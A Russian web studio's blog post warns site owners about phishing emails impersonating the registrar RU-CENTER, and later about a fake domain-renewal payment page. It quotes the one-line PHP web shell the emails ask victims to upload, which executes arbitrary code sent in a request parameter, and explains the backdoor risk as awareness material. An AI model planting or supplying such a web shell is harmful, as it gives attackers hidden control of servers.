Злоумышленики под видом РУ-ЦЕНТР
Внимание! Если доменный регистратор просит вас разместить какие-то файлы или программный код на вашем сайте — это злоумышленники!
Максимум, что может попросить сделать доменный регистратор: просить оплату за домен.
Ситуация: Обратился клиент. Сказал что получил письмо от РУ-ЦЕНТР и надо разместить файл на сайте.
<?php assert(stripcslashes($_REQUEST[RUCENTER])); ?>
Скриншот письма:
![Скриншот письма злоумышленников](/images/blog/2017/04-27/nic-virus.jpg)
Что произойдёт, если разместить:
Злоумышленники получат полный доступ к вашему сайту. На сайт будет загружен специальная программа Backdoor — это программа, основным назначением которой является скрытное управление сервером.
Никогда не располагайте файлы php, которые Вас просят разместить. Обратитесь к знакомым программистам, уточните несколько раз, но, скорее всего, это дорвей (место, через которое вредоносы приходят к вам на чай). Размещать можно файлы .txt, во многих случаях .html
![Игошев Дмитрий](/images/team/dreamod.jpg)
В сентябяре 2017 злоумышленники ушли ещё дальше
Скриншот письма:
![Скриншот письма злоумышленников](/images/blog/2017/04-27/reg_domain.jpg)
При переходе по ссылке вам предложат сделать оплату продление домена! Не делайте этого, вас обманывают!
Форма оплаты располагается на одном из взломанных сайтов ботнет сети, в нашем примере это был ck-union.ru (сайт по строительству коттеджей). После первого отказа от оплаты страница перестаёт существовать
Оставить комментарий